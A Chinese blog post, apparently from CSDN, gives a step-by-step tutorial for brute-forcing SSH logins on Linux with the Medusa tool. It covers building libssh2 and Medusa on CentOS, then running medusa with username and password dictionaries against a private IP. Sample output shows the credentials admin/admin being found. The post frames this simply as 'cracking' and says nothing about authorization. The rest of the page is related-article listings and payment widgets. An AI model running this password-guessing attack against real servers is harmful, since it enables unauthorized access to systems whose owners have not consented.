Linux远程ssh破解

最新推荐文章于 2024-07-19 15:41:30 发布
最新推荐文章于 2024-07-19 15:41:30 发布
阅读量987 收藏 3
点赞数
分类专栏: linux 文章标签: linux ssh 破解 user centos library

1. 软件

OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看)

库:libssh2-1.2.7.tar.gz  http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

medusa:medusa-2.0.tar.gz  wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

2. 安装libssh2-1.2.7

将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下,解压为libssh2-1.2.7并进入该目录:

2.1 ./configure

2.2 make

2.3 make install

3. 安装medusa-2.0

将medusa-2.0.tar.gz拷贝到/tmp/目录下,解压为medusa-2.0并进入该目录:

2.1 ./configure –build=”i686-pc-linux” –enable-moduel-ssh=yes

2.2 make

2.3 make install

4. 设置环境变量LD_LIBRARY_PATH便于用medusa破解SSH时找到相应的相应的共享库

export LD_LIBRARY_PATH=/usr/local/lib

NOTE:若在运行时出现如下类似错误时,一般用上述方法可解决

IMPORTANT: Couldn’t load “ssh” [libssh2.so.1: cannot open shared object file: No such file or directory].

5. 开始破解SSH

将字典(如brute.dic, p.dic)拷贝到目录/tmp/后,进入/tmp/目录,键入medusa可以看到其它帮助信息,根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126)

[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networksjmk@foofus.net

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)

ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]

ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)

当发现有”ACCOUNT FOUND”时,说明成功破解,在上述例子中我们的成功破解的用户名为admin,密码为admin.

fengling132
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssh 远程连接Linux工具
01-19
ssh工具 用于连接远程服务器 linux 系统 解压 安装即可使用
Linux远程访问工具,支持ssh服务
07-27
在IT领域,Linux远程访问工具是系统管理员和开发者不可或缺的利器,它们允许用户通过网络对远程Linux服务器进行操作,而不必亲临现场。SSH(Secure Shell)服务是这种远程访问的首选方式,它提供了安全的加密通信,...
暴力破解ssh、ftp、telnet等工具–Medusa
热门推荐
收集盒 Book box
06-24 1万+
Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC的密码爆破工具。 作者网站:ht
[转载] ssh medusa 2.0
BLOCKGOLD.E的博客
05-30 816
sudo ./configure --enable-module-ssh=yes 渗透linux环境的网络,口令破解是必不可少的。接下来介绍一款优秀的口令破解工具,首先先下载破解工具: medusa 是一款不错的口令破解软件,速度也不错,使用的时候,需要提供破解的ip,medusa本身不提供扫描功能,读取ip也只能为 单个ip,所以需要和nmap之类软件配合使用获取开...
两款SSH爆破工具的介绍:hydra+medusa
William234的博客
03-20 9489
两款SSH爆破工具的介绍:hydra+me...
Linux SSH密码暴力破解技术及攻击实战
weixin_34056162的博客
11-12 3101
对于 Linux 操作系统来说,一般通过 VNC、Teamviewer 和 SSH 等工具来进行远程管理,SSH 是 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。 SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SS...
LINUX防御ssh远程暴力破解
Druid_C的博客
01-03 757
在购买好服务器后,去查看主机登录日志和登录失败日志,如果发现入下图所示的长时段短时间内多IP登录失败日志,不要怀疑,你的服务器正在经受试图远程登录主机的暴力破解行为。 如何防范: 1.修改22端口号 一边都采用22端口作为远程登录端口 缺点:还是会被各种工具扫出来端口 2.限制登录IP 在购买好服务器时,默认是给所有IP提供访问权限的,如果暂时不希望有别的访问,可以先在/etc/hosts.deny里设置拒绝所有IP访问;再在/etc/hosts.allow里设置允许访问的IP。以仅允许家,学校,公司三个I
linux远程登录ssh免密码配置方法
09-15
Linux远程登录SSH免密码配置详解》 在Linux系统中,SSH(Secure SHell)是一种安全的网络协议,用于在不安全的网络环境下提供加密的远程登录和其他服务。免密码登录SSH是提升效率和保障安全的重要配置,尤其在...
SSH工具Linux系统远程.rar
08-18
SSH工具Linux系统远程
Linux配置远程SSH无密码登录
01-20
本文实例为大家分享了jaLinux配置远程SSH无密码登录的方法,供大家参考,具体内容如下 系统:CentOS 6.8 主机1:192.168.0.177 主机2:192.168.0.178 工具介绍: ssh-keygen:创建公钥和密钥 ssh-copy-id:把生成的...
Linux中的环境变量
qhy850716的博客
07-17 488
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
定制 Linux 内核的意义
地球空间
07-17 303
2. **配置内核**:使用 `make menuconfig` 或 `make xconfig` 配置内核,选择需要支持的硬件和功能。1. **性能优化**:通过定制内核,可以针对特定的硬件或应用场景优化性能,比如减少不必要的驱动支持、优化调度算法等。7. **持续维护**:随着时间的推移,可能需要对内核进行更新和维护,以支持新的硬件和功能。6. **测试和调试**:启动系统,测试新内核的功能和性能,根据需要进行调试和优化。4. **安装内核**:编译完成后,将生成的内核镜像和相关的模块安装到系统中。
Qmi8658a姿态传感器使用心得(2)linux
Starry的博客
07-19 1161
COD 原理,CTRL9,自检(详细代码示例)
Linux杂货铺】期末总结篇4:shell编程
聆风吟的博客
07-17 4288
本文主要分享作者本人期末复习的总结,欢迎大家借鉴浏览。
Linux编辑器——vim的使用
大学生一枚
07-18 602
原理:vim并不是直接执行,执行前会读取一些文件,比如.vimrc 我们把需要配置的指令写在.vimrc文件中,然后vim执行时就会读取.vimrc文件,配置一些功能,比如行号,自动缩进,自动补齐,代码提示等等;n+shift+x:可以删除光标之前的一个字符,n:一次可以删除n个,在一行以内。n+x :可以删除光标后面的一个字符,n:一次可以删除n个,在一行以内。:控制光标的移动,字符的输入,删除,复制粘贴等等,有一些相关的指令;n+shift+g=nG:将光标定位到整个文本的任意一行,
linux centos nginx 报错 client intended to send too large body: 104853014 bytes问题
qq_42250832的博客
07-17 350
这个错误通常发生在Web服务器处理HTTP请求时,当客户端尝试发送的请求体(body)大小超过了服务器配置的限制时。错误信息 “client intended to send too large body: 104853014 bytes” 表示客户端想要发送的数据量超过了100MB,这通常是由于客户端尝试上传一个非常大的文件或者提交了一个非常大的表单。增加服务器接收请求体的大小限制。这通常可以通过配置文件来实现,例如,如果你使用的是Nginx,可以修改client_max_body_size指令。
文件在Linux下为binary格式在Windows下为utf-8格式
qq_38220334的博客
07-17 350
想着是不是之前遇到的问题,有可能是文件中含有特殊字符,然后用vim命令来编辑这个文件,发现,还真是含有一个特殊字符,然后将它删除掉,文件就变成utf-8格式的文件了。在Windows下和Mac下都是没有问题的,在华为云服务器上也是没问题的(操作系统不是centos),但是在自己搭建的Linux服务器(centos)上是有问题的。用shell或者Python脚本去将这个文件转为utf-8格式的,但是都失败了。
Linux 权限
includemainprinf的博客
07-18 639
Linux操作系统中,权限管理是一个至关重要的概念,它确保了系统的安全性和稳定性。同时可以在工作中,设置对象的权限,就算我们很多人使用一台服务器,我们也可以让别人看不到我们文件的内容,或者让别人无法对自己的文件进行操作!
Linux 注意事项
最新发布
m0_74012211的博客
07-19 586
Linux 与 Windows 是两个相互独立的操作系统,两者有较大差距
linuxssh远程连接
08-02
Linux中,可以使用SSH(Secure Shell)来进行远程连接。SSH是一种加密的网络协议,可以安全地在本地和远程主机之间传输数据。要在Linux中使用SSH远程连接,需要确保已经安装了OpenSSH服务器。OpenSSHSSH协议的一个实现,它允许用户通过加密的方式远程登录和管理服务器。 在Linux中,SSH服务器的主程序是sshd,配置文件位于/etc/ssh/sshd_config。默认情况下,SSH服务器使用TCP的22端口。要连接远程主机,可以使用ssh命令,例如: ``` ssh user@host ``` 其中,user远程主机的用户名,host是远程主机的IP地址或域名。如果是第一次连接对方主机,系统会提示你确认主机的身份,需要输入yes来继续连接。 要启动或关闭SSH服务,可以使用一些命令。以CentOS 7 64位系统为例,可以使用以下命令: ``` sudo systemctl start sshd // 启动SSH服务 sudo systemctl stop sshd // 关闭SSH服务 sudo systemctl enable sshd // 设置SSH服务开机自启动 sudo systemctl disable sshd // 取消SSH服务开机自启动 ``` 请注意,只有在SSH服务开启的状态下,才能进行远程登录、连接和管理服务器。关闭SSH服务后,远程连接客户端将无法连接服务器,但已连接的客户端可以继续使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值